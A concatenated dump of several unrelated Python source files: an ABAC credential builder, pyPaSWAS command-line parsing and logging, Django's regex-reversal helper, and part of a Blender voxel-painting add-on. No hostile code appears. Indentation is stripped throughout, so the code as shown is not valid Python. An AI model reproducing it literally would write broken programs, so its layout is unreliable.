# PG says for those last 2:
# signed_cred.setAttribute("xsi:noNamespaceSchemaLocation", "http://www.protogeni.net/resources/credential/credential.xsd")
# signed_cred.setAttribute("xsi:schemaLocation", "http://www.protogeni.net/resources/credential/ext/policy/1 http://www.protogeni.net/resources/credential/ext/policy/1/policy.xsd")
doc.appendChild(signed_cred)
# Fill in the <credential> bit
cred = doc.createElement("credential")
cred.setAttribute("xml:id", self.get_refid())
signed_cred.appendChild(cred)
append_sub(doc, cred, "type", "abac")
# Stub fields
append_sub(doc, cred, "serial", "8")
append_sub(doc, cred, "owner_gid", '')
append_sub(doc, cred, "owner_urn", '')
append_sub(doc, cred, "target_gid", '')
append_sub(doc, cred, "target_urn", '')
append_sub(doc, cred, "uuid", "")
if not self.expiration:
self.set_expiration(datetime.datetime.utcnow() + datetime.timedelta(seconds=DEFAULT_CREDENTIAL_LIFETIME))
self.expiration = self.expiration.replace(microsecond=0)
if self.expiration.tzinfo is not None and self.expiration.tzinfo.utcoffset(self.expiration) is not None:
# TZ aware. Make sure it is UTC
self.expiration = self.expiration.astimezone(tz.tzutc())
append_sub(doc, cred, "expires", self.expiration.strftime(SFATIME_FORMAT)) # RFC3339
abac = doc.createElement("abac")
rt0 = doc.createElement("rt0")
abac.appendChild(rt0)
cred.appendChild(abac)
append_sub(doc, rt0, "version", "1.1")
head = self.createABACElement(doc, "head", self.get_head())
rt0.appendChild(head)
for tail in self.get_tails():
tailEle = self.createABACElement(doc, "tail", tail)
rt0.appendChild(tailEle)
# Create the <signatures> tag
signatures = doc.createElement("signatures")
signed_cred.appendChild(signatures)
# Get the finished product
self.xml = doc.toxml("utf-8")
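# Usage sketch (illustrative only; the file name is hypothetical and must
# contain an already-signed ABAC credential in GENI XML form):
#
#     cred = ABACCredential(filename='speaks_for_cred.xml')
#     print cred.pretty_cred()   # e.g. [ABAC cred: AGENT.speaks_for_AGENT<-CLIENT]
#     head = cred.get_head()     # ABACElement for the asserting principal
#     tails = cred.get_tails()   # list of ABACElement instances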
|
|
'''
TODO Add a proper introduction of the package.
'''
from pyPaSWAS.Core.Exceptions import InvalidOptionException
from datetime import datetime
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import logging
import optparse
import os
import sys
def set_logger(settings):
'''
    This function creates a logger object that always logs to the command
line or optionally to a log file. Refer to the documentation of the
standard logging module for more information. The logger object is
stored in self.logger.
the following values should be present in self.settings:
string self.settings.logfile: the file to which messages are logged. If
logging to a file is not required, this value should be None.
int self.settings.loglevel: the threshold level for logging.
See the built-in logging module for details.
'''
# Check log level for validity
    numeric_level = getattr(logging, settings.loglevel.upper(), None)
if not isinstance(numeric_level, int):
raise InvalidOptionException('Invalid log level: %s' % settings.loglevel)
# Root logger, stdout handler will be removed
logger = logging.getLogger()
lh_stdout = logger.handlers[0]
logger.setLevel(numeric_level)
# Configure logging to console
if settings.logfile is None:
        # Only import when printing to terminal otherwise the ANSI escapes end up in a (log) file
from pyPaSWAS.Core.cfg import Colorer
console_format = logging.Formatter('%(levelname)s - %(message)s')
console_format.propagate = False
console_handler = logging.StreamHandler()
console_handler.setLevel(numeric_level)
console_handler.setFormatter(console_format)
logger.addHandler(console_handler)
elif settings.logfile is not None:
# Check log file for validity. For uniformity a ValueError may be raised
try:
logfile = open(settings.logfile, 'a')
_log_settings_to_file(logfile, settings)
logfile.close()
except(IOError):
raise InvalidOptionException('Invalid log file or writing forbidden: %s' % settings.logfile)
file_format = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
file_format.propagate = False
file_handler = logging.FileHandler(settings.logfile)
file_handler.setLevel(numeric_level)
file_handler.setFormatter(file_format)
logger.addHandler(file_handler)
# Disable root logger (stdout)
logger.removeHandler(lh_stdout)
return logger
def parse_cli(config_file):
'''
parseCLI()
This function parses the command line using the optparse module from the python standard library.
    Though deprecated since Python 2.7, optparse is still used instead of argparse because the Python
    version available on the development systems was 2.6.
The options and arguments are stored in the global variables settings and arguments, respectively.
'''
# Read defaults
config = ConfigParser.ConfigParser()
try:
config.read(config_file)
except ConfigParser.ParsingError:
raise ConfigParser.ParsingError("Unable to parse the defaults file ({})".format(config_file))
parser = optparse.OptionParser()
parser.description = ('This program performs a Smith-Waterman alignment of all sequences in FILE_1'
' against all sequences in FILE_2.\nBoth files should be in the fasta format.')
usage = '%prog [options] FILE_1 FILE_2'
parser.usage = usage
# general options
# TODO: Get final naming (convention) for all parameters!!
general_options = optparse.OptionGroup(parser, 'Options that affect the general operation of the program')
general_options.add_option('-L', '--logfile', help='log events to FILE', metavar="FILE", dest='logfile')
general_options.add_option('--loglevel', help='log level. Valid options are DEBUG, INFO, WARNING, ERROR'
' and CRITICAL', dest='loglevel', default=config.get('General', 'loglevel'))
general_options.add_option('-o', '--out', help='The file in which the program stores the generated output.'
'\nDefaults to ./output', dest='out_file', default=config.get('General', 'out_file'))
general_options.add_option('--outputformat', help='The format of the file in which the program stores the '
'generated output.\nAvailable options are TXT and SAM.\nDefaults to txt',
dest='out_format', default=config.get('General', 'out_format'))
general_options.add_option('-p', '--program', help='The program to be executed. Valid options are "aligner"'
' and "trimmer"', dest='program',
default=config.get('General', 'program'))
general_options.add_option('-1', '--filetype1', help='File type of the first file. See bioPython IO for'
' available options', dest='filetype1', default=config.get('General', 'filetype1'))
general_options.add_option('-2', '--filetype2', help='File type of the second file. See bioPython IO for'
' available options', dest='filetype2', default=config.get('General', 'filetype2'))
general_options.add_option('-O', '--override_output', help='When output file exists, override it (T/F)',
dest='override_output', default=config.get('General', 'override_output'))
general_options.add_option('-c', '--configfile', help='Give settings using configuration file',
dest='config_file', default=False)
parser.add_option_group(general_options)
input_options = optparse.OptionGroup(parser, 'start & stop indices for processing files. Handy for cluster processing. Leave all to zero to process all.')
input_options.add_option('--start_query', help='start index in the query file (1)', dest='start_query', default=config.get("Input", "start_query"))
input_options.add_option('--end_query', help='end index in the query file (1)', dest='end_query', default=config.get("Input", "end_query"))
input_options.add_option('--start_target', help='start index in the target file (2)', dest='start_target', default=config.get("Input", "start_target"))
input_options.add_option('--end_target', help='end index in the target file (2)', dest='end_target', default=config.get("Input", "end_target"))
input_options.add_option('--sequence_step', help='Number of sequences read from file 2 before processing. Handy when processing NGS files.',
dest='sequence_step', default=config.get('Input', 'sequence_step'))
input_options.add_option('--query_step', help='Number of sequences read from file 1 before processing. Handy when processing NGS files.',
dest='query_step', default=config.get('Input', 'query_step'))
parser.add_option_group(input_options)
aligner_options = optparse.OptionGroup(parser, 'Options that affect the alignment.\nAligners include aligner'
' and mapper')
aligner_options.add_option('--customMatrix', help='the custom matrix that should be used', dest='custom_matrix')
aligner_options.add_option('-G', '--gap_score', help='Float. Penalty for a gap', dest='gap_score',
default=config.get('Aligner', 'gap_score'))
aligner_options.add_option('-g', '--gap_extension', help='Float. Penalty for a gap extension. Set to zero to ignore this (faster)', dest='gap_extension',
default=config.get('Aligner', 'gap_extension'))
aligner_options.add_option('-M', '--matrixname', help='The scoring to be used. Valid options are '
'"DNA-RNA", "BASIC", "Blosum62", "Blosum80" and "CUSTOM"', dest='matrix_name',
default=config.get('Aligner', 'matrix_name'))
aligner_options.add_option('-q', '--mismatch_score', help='Float. Penalty for mismatch', dest='mismatch_score',
default=config.get('Aligner', 'mismatch_score'))
aligner_options.add_option('-r', '--match_score', help='Float. Reward for match', dest='match_score',
default=config.get('Aligner', 'match_score'))
aligner_options.add_option('--any', help='Float. Score for a character which is neither in the nucleotide'
' list ("ACGTU"), nor equal to the anyNucleotide character ("N").\nOnly relevant'
' for use with the DNA-RNA scoring type.', dest='any_score',
default=config.get('Aligner', 'any_score'))
aligner_options.add_option('--other', help='Float. Score if the anyNucleotide character ("N") is present in'
' either query or subject.\nOnly relevant for use with the DNA-RNA scoring type.',
dest='other_score', default=config.get('Aligner', 'other_score'))
aligner_options.add_option('--minimum', help='Float. Sets the minimal score that initiates a back trace.'
' Do not set this very low: output may be flooded by hits.', dest='minimum_score',
default=config.get('Aligner', 'minimum_score'))
aligner_options.add_option('--llimit', help='Float. Sets the lower limit for the maximum score '
'which will be used to report a hit. pyPaSWAS will then also report hits with '
'a score lowerLimitScore * highest hit score. Set to <= 1.0. ',
dest='lower_limit_score', default=config.get('Aligner', 'lower_limit_score'))
parser.add_option_group(aligner_options)
filter_options = optparse.OptionGroup(parser, 'Options for filtering the output' )
filter_options.add_option('--filter_factor', help='The filter factor to be used. Reports only hits within'
' filterFactor * highest possible score * length shortest sequence (or: defines'
' lowest value of the reported relative score). Set to <= 1.0',
dest='filter_factor', default=config.get('Filter', 'filter_factor'))
filter_options.add_option('--query_coverage', help='Minimum query coverage. Set to <= 1.0',
dest='query_coverage', default=config.get('Filter', 'query_coverage'))
filter_options.add_option('--query_identity', help='Minimum query identity. Set to <= 1.0',
dest='query_identity', default=config.get('Filter', 'query_identity'))
filter_options.add_option('--relative_score', help='Minimum relative score, defined by the alignment score'
' divided by the length of the shortest of the two sequences. Set to <= highest possible score'
', for example 5.0 in case of DNA',
dest='relative_score', default=config.get('Filter', 'relative_score'))
filter_options.add_option('--base_score', help='Minimum base score, defined by the alignment score'
' divided by the length of the alignment (including gaps). Set to <= highest possible score'
', for example 5.0 in case of DNA',
dest='base_score', default=config.get('Filter', 'base_score'))
parser.add_option_group(filter_options)
graph_options = optparse.OptionGroup(parser, 'Options to connect to a neo4j graph database and store mappings in a graph')
graph_options.add_option('--hostname',help='Neo4j database host', default=config.get("GraphDatabase", "hostname"), dest="hostname")
graph_options.add_option('--username',help='Neo4j user name', default=config.get("GraphDatabase", "username"), dest="username")
graph_options.add_option('--password',help='Neo4j password', default=config.get("GraphDatabase", "password"), dest="password")
graph_options.add_option('--target_node',help='Target node name', default=config.get("GraphDatabase", "target_node"), dest="target_node")
graph_options.add_option('--sequence_node',help='Sequence node name', default=config.get("GraphDatabase", "sequence_node"), dest="sequence_node")
parser.add_option_group(graph_options)
device_options = optparse.OptionGroup(parser, 'Options that affect the usage and settings of the '
'parallel devices')
device_options.add_option('--device', help='the device on which the computations will be performed. '
'This should be an integer.', dest='device_number',
default=config.get('Device', 'device_number'))
device_options.add_option('--number_of_compute_units', help='Number of compute units to use (openCL only). Will not work on every device, recommended for CPU only. Set this 1 to use a single core on the device for example.'
'This should be an integer, using 0 for full device.', dest='number_of_compute_units',
default=config.get('Device', 'number_of_compute_units'))
device_options.add_option('--sub_device', help='the sub device on which the computations will be performed. Only used when number_of_compute_units > 0. '
'This should be an integer.', dest='sub_device',
default=config.get('Device', 'sub_device'))
device_options.add_option('--limit_length', help='Length of the longest sequence in characters to be read'
' from file. Lower this when memory of GPU is low.', dest='limit_length',
default=config.get('Device', 'limit_length'))
device_options.add_option('--maximum_memory_usage', help='Fraction (<= 1.0) of available device memory to use. Useful when several pyPaSWAS applications are running.', dest="maximum_memory_usage", default=config.get('Device', 'maximum_memory_usage'))
device_options.add_option('--njobs', help='Sets the number of jobs run simultaneously on the grid. Will read'
' only part of the sequence file. (not implemented yet)', dest='number_of_jobs')
device_options.add_option('--process_id', help='Sets the processID of this job in the grid. ',
dest='process_id')
device_options.add_option('--max_genome_length', help='Deprecated.\nDefaults to 200000',
dest='max_genome_length', default=config.get('Device', 'max_genome_length'))
device_options.add_option('--recompile', help='Recompile CUDA code? Set to F(alse) when sequences are of similar length: much faster.',
dest='recompile', default=config.get('Device', 'recompile'))
device_options.add_option('--short_sequences', help='Set to T(true) when aligning short sequences (trimming?) to maximize memory usage.',
dest='short_sequences', default=config.get('Device', 'short_sequences'))
parser.add_option_group(device_options)
framework_options = optparse.OptionGroup(parser, 'Determines which parallel computing framework to use for this program ')
framework_options.add_option('--framework', help='Choose which parallel computing framework to use, can be either CUDA or OpenCL ', dest='framework',default=config.get('Framework','language'))
parser.add_option_group(framework_options)
ocl_options = optparse.OptionGroup(parser, 'Options for the usage of the OpenCL framework ')
    ocl_options.add_option('--device_type', help='Type of device to perform computations on (either CPU, GPU or ACCELERATOR)',
dest='device_type', default=config.get('OpenCL', 'device_type'))
ocl_options.add_option('--platform_name', help='Platform to run computations on (either Intel, NVIDIA or AMD)',
dest='platform_name', default=config.get('OpenCL', 'platform_name'))
parser.add_option_group(ocl_options)
(settings, arguments) = parser.parse_args()
# If an extra configuration file is given, override settings as given by this file
if settings.config_file:
(settings, arguments) = _override_settings(settings.config_file, settings, arguments)
if len(arguments) < 2:
raise InvalidOptionException('Missing input files')
return (settings, arguments)
def _override_settings(config_file, settings, arguments):
''' Parse optional config file and change arguments accordingly '''
config = ConfigParser.ConfigParser()
try:
config.read(config_file)
except ConfigParser.ParsingError:
raise ConfigParser.ParsingError("Unable to parse the given configuration file ({})".format(config_file))
# Replace input files with those given in the config file
#if config.get('General', 'FILE1') != '' and config.get('General', 'FILE2') != '':
# arguments = [config.get('General', 'FILE1'), config.get('General', 'FILE2')]
# config.remove_option('General', 'FILE1')
# config.remove_option('General', 'FILE2')
# Replace all other settings set in the config file
sections = config.sections()
for section in sections:
section_settings = [name for name, setting in config.items(section)]
for setting in section_settings:
if config.get(section, setting):
settings._update_careful({setting: config.get(section, setting)})
return (settings, arguments)
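# Example (illustrative values): a minimal override file accepted by
# _override_settings(); section and option names must match those used in the
# defaults file read by parse_cli().
#
#     [General]
#     loglevel = DEBUG
#     out_file = results.txt
#
#     [Aligner]
#     gap_score = -5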
def _log_settings_to_file(logfile_handle, settings):
''' Prints all settings in effect using the given log file handle '''
# Print analysis start time
today = datetime.today()
logfile_handle.write("\n{}\n".format('-' * 74))
logfile_handle.write(today.strftime("pyPaSWAS run started at: %Y-%m-%d %H:%M:%S"
" using the following settings:\n"))
logfile_handle.write("{}\n".format('-' * 74))
# Iterate all settings and write to log file
for setting, value in vars(settings).items():
        if value is None:
value = 'N/A'
setting_table = "{0:30}".format(setting), ':', "{0:>30}\n".format(value)
logfile_handle.write(''.join(setting_table))
logfile_handle.write("{}\n".format('-' * 74))
def normalize_file_path(path):
'''creates an absolute path from a relative path'''
if not os.path.isabs(path):
curdir = os.getcwd()
path = os.path.join(curdir, path)
path = os.path.normpath(path)
return path
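# Typical flow (illustrative only; 'defaults.cfg' is a hypothetical path):
#
#     settings, arguments = parse_cli('defaults.cfg')
#     logger = set_logger(settings)
#     query_file = normalize_file_path(arguments[0])
#     target_file = normalize_file_path(arguments[1])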
|
|
"""
Functions for reversing a regular expression (used in reverse URL resolving).
Used internally by Django and not intended for external use.
This is not, and is not intended to be, a complete reg-exp decompiler. It
should be good enough for a large class of URLs, however.
"""
from __future__ import unicode_literals
from django.utils import six
from django.utils.six.moves import zip
# Mapping of an escape character to a representative of that class. So, e.g.,
# "\w" is replaced by "x" in a reverse URL. A value of None means to ignore
# this sequence. Any missing key is mapped to itself.
ESCAPE_MAPPINGS = {
"A": None,
"b": None,
"B": None,
"d": "0",
"D": "x",
"s": " ",
"S": "x",
"w": "x",
"W": "!",
"Z": None,
}
class Choice(list):
"""
Used to represent multiple possibilities at this point in a pattern string.
We use a distinguished type, rather than a list, so that the usage in the
code is clear.
"""
class Group(list):
"""
Used to represent a capturing group in the pattern string.
"""
class NonCapture(list):
"""
Used to represent a non-capturing group in the pattern string.
"""
def normalize(pattern):
"""
Given a reg-exp pattern, normalizes it to an iterable of forms that
suffice for reverse matching. This does the following:
(1) For any repeating sections, keeps the minimum number of occurrences
permitted (this means zero for optional groups).
(2) If an optional group includes parameters, include one occurrence of
that group (along with the zero occurrence case from step (1)).
(3) Select the first (essentially an arbitrary) element from any character
class. Select an arbitrary character for any unordered class (e.g. '.'
or '\w') in the pattern.
    (4) Ignore comments and any of the reg-exp flags that won't change
        what we construct ("iLmsu"). "(?x)" is an error, however.
    (5) Raise an error on all other non-capturing (?...) forms (e.g.
        look-ahead and look-behind matches) and any disjunctive ('|')
        constructs.
Django's URLs for forward resolving are either all positional arguments or
all keyword arguments. That is assumed here, as well. Although reverse
resolving can be done using positional args when keyword args are
specified, the two cannot be mixed in the same reverse() call.
"""
# Do a linear scan to work out the special features of this pattern. The
# idea is that we scan once here and collect all the information we need to
# make future decisions.
result = []
non_capturing_groups = []
consume_next = True
pattern_iter = next_char(iter(pattern))
num_args = 0
# A "while" loop is used here because later on we need to be able to peek
# at the next character and possibly go around without consuming another
# one at the top of the loop.
try:
ch, escaped = next(pattern_iter)
except StopIteration:
return [('', [])]
try:
while True:
if escaped:
result.append(ch)
elif ch == '.':
# Replace "any character" with an arbitrary representative.
result.append(".")
elif ch == '|':
                # FIXME: One day we should do this, but not in 1.0.
raise NotImplementedError('Awaiting Implementation')
elif ch == "^":
pass
elif ch == '$':
break
elif ch == ')':
# This can only be the end of a non-capturing group, since all
# other unescaped parentheses are handled by the grouping
# section later (and the full group is handled there).
#
# We regroup everything inside the capturing group so that it
# can be quantified, if necessary.
start = non_capturing_groups.pop()
inner = NonCapture(result[start:])
result = result[:start] + [inner]
elif ch == '[':
# Replace ranges with the first character in the range.
ch, escaped = next(pattern_iter)
result.append(ch)
ch, escaped = next(pattern_iter)
while escaped or ch != ']':
ch, escaped = next(pattern_iter)
elif ch == '(':
# Some kind of group.
ch, escaped = next(pattern_iter)
if ch != '?' or escaped:
# A positional group
name = "_%d" % num_args
num_args += 1
result.append(Group((("%%(%s)s" % name), name)))
walk_to_end(ch, pattern_iter)
else:
ch, escaped = next(pattern_iter)
if ch in "iLmsu#":
# All of these are ignorable. Walk to the end of the
# group.
walk_to_end(ch, pattern_iter)
elif ch == ':':
# Non-capturing group
non_capturing_groups.append(len(result))
elif ch != 'P':
# Anything else, other than a named group, is something
# we cannot reverse.
raise ValueError("Non-reversible reg-exp portion: '(?%s'" % ch)
else:
ch, escaped = next(pattern_iter)
if ch not in ('<', '='):
raise ValueError("Non-reversible reg-exp portion: '(?P%s'" % ch)
                        # We are in a named capturing group. Extract the name
                        # and then skip to the end.
if ch == '<':
terminal_char = '>'
# We are in a named backreference.
else:
terminal_char = ')'
name = []
ch, escaped = next(pattern_iter)
while ch != terminal_char:
name.append(ch)
ch, escaped = next(pattern_iter)
param = ''.join(name)
# Named backreferences have already consumed the
# parenthesis.
if terminal_char != ')':
result.append(Group((("%%(%s)s" % param), param)))
walk_to_end(ch, pattern_iter)
else:
result.append(Group((("%%(%s)s" % param), None)))
elif ch in "*?+{":
                # Quantifiers affect the previous item in the result list.
count, ch = get_quantifier(ch, pattern_iter)
if ch:
                    # We had to look ahead, but it wasn't needed to compute
                    # the quantifier, so use this character next time around
                    # the main loop.
consume_next = False
if count == 0:
if contains(result[-1], Group):
# If we are quantifying a capturing group (or
# something containing such a group) and the minimum is
# zero, we must also handle the case of one occurrence
# being present. All the quantifiers (except {0,0},
# which we conveniently ignore) that have a 0 minimum
# also allow a single occurrence.
result[-1] = Choice([None, result[-1]])
else:
result.pop()
elif count > 1:
result.extend([result[-1]] * (count - 1))
else:
# Anything else is a literal.
result.append(ch)
if consume_next:
ch, escaped = next(pattern_iter)
else:
consume_next = True
except StopIteration:
pass
except NotImplementedError:
# A case of using the disjunctive form. No results for you!
return [('', [])]
return list(zip(*flatten_result(result)))
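# Illustrative sketch (not part of the original module): for a typical named-group
# pattern, the function above yields one (format string, parameter list) pair,
# assuming the Group/NonCapture helpers and ESCAPE_MAPPINGS defined earlier:
#     pattern r'^articles/(?P<year>\d{4})/$'  ->  [('articles/%(year)s/', ['year'])]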
def next_char(input_iter):
"""
An iterator that yields the next character from "input_iter", respecting
escape sequences. An escaped character is replaced by a representative of
its class (e.g. \w -> "x"). If the escaped character is one that is
skipped, it is not returned (the next character is returned instead).
Yields the next character, along with a boolean indicating whether it came
from an escape sequence (True) or is a raw, unescaped character (False).
"""
for ch in input_iter:
if ch != '\\':
yield ch, False
continue
ch = next(input_iter)
representative = ESCAPE_MAPPINGS.get(ch, ch)
if representative is None:
continue
yield representative, True
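# Illustrative sketch: iterating next_char() over a raw pattern, assuming
# ESCAPE_MAPPINGS maps '\d' to the representative '0':
#     list(next_char(iter(r'a\d')))  # -> [('a', False), ('0', True)]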
def walk_to_end(ch, input_iter):
"""
The iterator is currently inside a capturing group. We want to walk to the
close of this group, skipping over any nested groups and handling escaped
parentheses correctly.
"""
if ch == '(':
nesting = 1
else:
nesting = 0
for ch, escaped in input_iter:
if escaped:
continue
elif ch == '(':
nesting += 1
elif ch == ')':
if not nesting:
return
nesting -= 1
def get_quantifier(ch, input_iter):
"""
Parse a quantifier from the input, where "ch" is the first character in the
quantifier.
Returns the minimum number of occurrences permitted by the quantifier and
either None or the next character from the input_iter if the next character
is not part of the quantifier.
"""
if ch in '*?+':
try:
ch2, escaped = next(input_iter)
except StopIteration:
ch2 = None
if ch2 == '?':
ch2 = None
if ch == '+':
return 1, ch2
return 0, ch2
quant = []
while ch != '}':
ch, escaped = next(input_iter)
quant.append(ch)
quant = quant[:-1]
values = ''.join(quant).split(',')
# Consume the trailing '?', if necessary.
try:
ch, escaped = next(input_iter)
except StopIteration:
ch = None
if ch == '?':
ch = None
return int(values[0]), ch
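# Illustrative sketch of the two quantifier forms handled above ("input_iter" is a
# next_char() iterator positioned just after the leading quantifier character):
#     get_quantifier('*', next_char(iter('abc')))    # -> (0, 'a')
#     get_quantifier('{', next_char(iter('2,3}x')))  # -> (2, 'x')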
def contains(source, inst):
"""
Returns True if "source" contains an instance of "inst", False otherwise.
"""
if isinstance(source, inst):
return True
if isinstance(source, NonCapture):
for elt in source:
if contains(elt, inst):
return True
return False
def flatten_result(source):
"""
Turns the given source sequence into a list of reg-exp possibilities and
their arguments. Returns a list of strings and a list of argument lists.
Each of the two lists will be of the same length.
"""
if source is None:
return [''], [[]]
if isinstance(source, Group):
if source[1] is None:
params = []
else:
params = [source[1]]
return [source[0]], [params]
result = ['']
result_args = [[]]
pos = last = 0
for pos, elt in enumerate(source):
if isinstance(elt, six.string_types):
continue
piece = ''.join(source[last:pos])
if isinstance(elt, Group):
piece += elt[0]
param = elt[1]
else:
param = None
last = pos + 1
for i in range(len(result)):
result[i] += piece
if param:
result_args[i].append(param)
if isinstance(elt, (Choice, NonCapture)):
if isinstance(elt, NonCapture):
elt = [elt]
inner_result, inner_args = [], []
for item in elt:
res, args = flatten_result(item)
inner_result.extend(res)
inner_args.extend(args)
new_result = []
new_args = []
for item, args in zip(result, result_args):
for i_item, i_args in zip(inner_result, inner_args):
new_result.append(item + i_item)
new_args.append(args[:] + i_args)
result = new_result
result_args = new_args
if pos >= last:
piece = ''.join(source[last:])
for i in range(len(result)):
result[i] += piece
return result, result_args
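# Illustrative sketch: flattening a source list that mixes literal text with a
# Group entry (Group as constructed in the parsing loop above):
#     flatten_result(['articles/', Group(('%(year)s', 'year')), '/'])
#     # -> (['articles/%(year)s/'], [['year']])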
|
|
"""
addon-voxel-painter.py
Copyright (c) 2013 Luke Frisken
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import bpy
from bpy.props import StringProperty, BoolProperty, IntProperty, FloatProperty, \
FloatVectorProperty, EnumProperty, PointerProperty
from bpy.types import Operator
from mathutils import Vector
from bpy_extras import view3d_utils
#Miscellaneous Functions and classes
def operator_contextswitch(context, obj, operator, **argsdic):
ctx = context.copy()
ctx["active_object"] = obj
ctx["selected_bases"] = [obj]
#ctx["edit_object"] = None
ctx["object"] = obj
operator(ctx, **argsdic)
del ctx
def selection_context(obj):
override = {'selected_bases':[obj],
'object':obj,
'active_object':obj}
return override
def get_active(context):
return context.scene.objects.active
def set_active(context, obj):
#if(obj is None):
#print("active:None")
context.scene.objects.active = obj
def select_none(context, active=False):
bpy.ops.object.select_all(action='DESELECT')
if(not active):
set_active(context, None)
class SelectionBackup(object):
"""This class is used for creating a backup of the context
in the current scene. active_only flag is used to tell it
to only pay attention to the active object, and not touch
the rest of the selection stuff"""
def __init__(self, context, active_only=False, append=False):
self.append = append
self.active_only = active_only
self.context = context
self.active = get_active(self.context)
if not self.active_only:
self.bases = self.context.selected_bases.copy()
def restore(self):
if self.active_only:
set_active(self.context, self.active)
return
if not self.append:
select_none(self.context)
for b in self.bases:
#check that the object still exists
if(b in self.context.selectable_bases):
try:
b.select = True
except:
pass
#print("restoring active")
set_active(self.context, self.active)
#print("done restoring active")
#Voxel Editor base classes
class VoxelRayIntersection(object):
def __init__(self, voxel, loc, nor, dist_squared):
self.voxel = voxel
self.dist_squared = dist_squared
self.loc = loc
self.nor = nor
def __str__(self):
return "VRI Vox:{0}, Dist:{1}".format(
self.voxel.obj.name,
self.dist_squared)
class BlenderObject(object):
def __init__(self, obj, context):
self.obj = obj
self.context = context
def select(self, active=True):
"""Select the voxel in the blender viewport"""
self.obj.select = True
if active:
set_active(self.context, self.obj)
def deselect(self, active=False):
"""Deselect the voxel in the blender viewport"""
self.obj.select = False
if(get_active(self.context) == self.obj):
set_active(self.context, None)
def delete(self):
select_none(self.context)
self.select()
bpy.ops.object.delete()
def get_local_location(self):
return self.obj.location
class BlenderObjectMesh(BlenderObject):
def __init__(self, obj, context, creating=False):
super(BlenderObjectMesh, self).__init__(obj, context)
if creating == True:
self.copy_obj_mesh_name()
def copy_obj_mesh_name(self):
self.obj.data.name = self.obj.name
class IntersectionMesh(BlenderObjectMesh):
pass
class Voxel(BlenderObjectMesh):
#Operator Poll Functions
@classmethod
def poll_voxel_mesh(cls, obj):
if(obj.type != 'MESH'):
return False
if(obj.parent is not None):
if(VoxelArray.poll_voxelarray_empty_created(obj.parent)):
return True
return False
def copy_props(self, dic):
"""copy voxel properties to an external dictionary dic"""
@classmethod
def gen_get_name(cls, vec):
"""Get the string for the object name using position vector"""
return "Voxel" + "({0}, {1}, {2})".format(vec[0], vec[1], vec[2])
def gen_set_name(self, vec):
"""Set voxel object name"""
self.obj.name = self.gen_get_name(vec)
self.copy_obj_mesh_name()
def set_draw_type(self, draw_type):
#print("setting " + str(self.obj) + "to drawtype: " + str(draw_type))
self.obj.draw_type = draw_type
def delete(self):
isect_mesh = self.get_isect_mesh()
if isect_mesh is not None:
isect_mesh.delete()
#TODO, if I have other children types,
#could change to just deleting all of the children,
#and using the BlenderObject delete method to do this.
super(Voxel, self).delete()
def select(self):
self.obj.select = True
def deselect(self):
self.obj.select = False
def select_children(self):
for obj in self.obj.children:
obj.select=True
def is_selected(self):
return self.obj.select
def get_isect_mesh(self):
for obj in self.obj.children:
if obj.type == 'MESH':
if "_isect" in obj.name:
return IntersectionMesh(obj, self.context)
return None
def ray_cast(self, ray_origin, ray_target):
"""Wrapper for ray casting that moves the ray into object space"""
# get the ray relative to the object
matrix_inv = self.obj.matrix_world.inverted()
ray_origin_obj = matrix_inv * ray_origin
ray_target_obj = matrix_inv * ray_target
# cast the ray
hit, normal, face_index = self.obj.ray_cast(ray_origin_obj, ray_target_obj)
if face_index != -1:
#hit relative to world
hit_world = self.obj.matrix_world * hit
dist_squared = (hit_world - ray_origin).length_squared
vri = VoxelRayIntersection(self, hit, normal, dist_squared)
return vri
else:
return None
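# Illustrative sketch: ray_cast() takes world-space endpoints, converts them into
# the voxel's object space before calling obj.ray_cast(), and returns None on a miss.
#     vri = voxel.ray_cast(Vector((0.0, 0.0, 10.0)), Vector((0.0, 0.0, -10.0)))
#     if vri is not None:
#         print("hit", vri.loc, vri.dist_squared)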
#keep this here for reference in case I decide to use
#duplis for the voxels
#def visible_objects_and_duplis():
#"""Loop over (object, matrix) pairs (mesh only)"""
#for obj in context.visible_objects:
#if obj.type == 'MESH':
#yield (obj, obj.matrix_world.copy())
#if obj.dupli_type != 'NONE':
#obj.dupli_list_create(scene)
#for dob in obj.dupli_list:
#obj_dupli = dob.object
#if obj_dupli.type == 'MESH':
#yield (obj_dupli, dob.matrix.copy())
def intersect_mesh(self, obj):
"""run a boolean intersect operation between a mesh object and the voxel
and the resultant mesh is parented to the voxel"""
select_none(bpy.context)
self.select()
print("Active:", bpy.context.active_object)
print("Object:", bpy.context.object)
print("self:", self.obj)
bpy.ops.object.duplicate() #duplicate selected object
#duplicated object is now selected and active
print("Active:", bpy.context.active_object)
print("Object:", bpy.context.object)
isect_obj = bpy.context.scene.objects[self.obj.name + ".001"]
isect_obj.select=True
bpy.context.scene.objects.active = isect_obj
isect_obj.name = self.obj.name + "_isect"
isect_obj.parent = self.obj
isect_obj.location = Vector((0.0, 0.0, 0.0))
#bpy.ops.object.modifier_add(type='BOOLEAN')
#select_none(bpy.context)
isect_mesh = IntersectionMesh(isect_obj, self.context, creating=True)
isect_mesh.select()
override = selection_context(isect_obj)
bpy.ops.object.modifier_add(override, type='BOOLEAN')
print(isect_obj.type)
print(isect_obj.name)
bool_mod = isect_obj.modifiers[0]
bool_mod.object = obj
bpy.ops.object.modifier_apply(override, modifier=bool_mod.name)
isect_obj.draw_type = "TEXTURED"
class VoxelArray(object):
"""VoxelArray is a utility class to facilitate accessing the sparse voxel
array, and saving to blend file.
An example usage would be:
va = VoxelArray(context.object)
va[0, 0, 0] = Voxel(...)
during assignment Voxel object is converted to blender's python ID property
format.
Currently voxels are based on objects in blender. This is convenient, because
